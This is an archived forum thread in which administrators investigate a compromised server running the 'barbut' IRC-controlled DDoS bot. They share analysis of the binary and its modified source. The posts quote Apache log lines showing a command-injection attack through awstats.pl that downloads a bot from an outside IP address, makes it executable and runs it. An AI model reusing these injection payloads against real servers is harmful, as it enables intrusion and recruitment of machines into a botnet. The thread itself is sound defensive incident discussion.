Re: barbut process using 100% cpu and connecting

krzysiek schrieb:

> > there was a process called "barbut" (2 of them) using 49,2% CPU time > > each :O > > meanwhile netstat showed established connections to 195.73.177.146:666 > > + several waiting. > Some host in .nl. > > I have no idea where did this process come from. Any clues? > I don't know about you, but I would take the machine off the net and > try to understand what happened.

I hope the original poster did that - here's the "barbut" occurrence in our apache log:

GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut; echo| HTTP/1.1

(there are four attempts, trying different paths to awstats.pl)

I did the wget, and it's a 30KB ELF executable. 'nm' shows such things as 'flooders', 'getspoofs', 'changeservers' ... I don't think I'll run it ;-)

Googling for some of those names finds this is probably the source code:

formatting link

The comments start:

"This is a IRC based distributed denial of service client. It connects to the server specified below and accepts commands via the channel specified."

Hope this was useful, A.

Reply to
A
Loading thread data ...

I've found similar requests in yesterdays log (19/Nov/2007:20:02:53

+0100) "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget
formatting link
barbut.c -o barbut;./ barbut ; HTTP/1.1"

W.r.t. the sources mentioned above, barbut.c has been changed, including the following differences:

  • The CHAN (channel to join) changed from "#whatever" to "#whatever1"
  • The server list has been replaced by the single entry "217.79.176.126"
  • The initial connection was has changed from port 6667 to port 113
  • The "run command" macro has changed from "SH " to "ZK "
  • The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE %s +iwx"

That didn't apparently succeed, so I don't know who are the victims...

Reply to
ale2007

I found the same connection to my Imail server and Sophos posted this a few minutes ago.

formatting link

Reply to
Peder.Rovelstad

Cabling-Design.com Forums website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.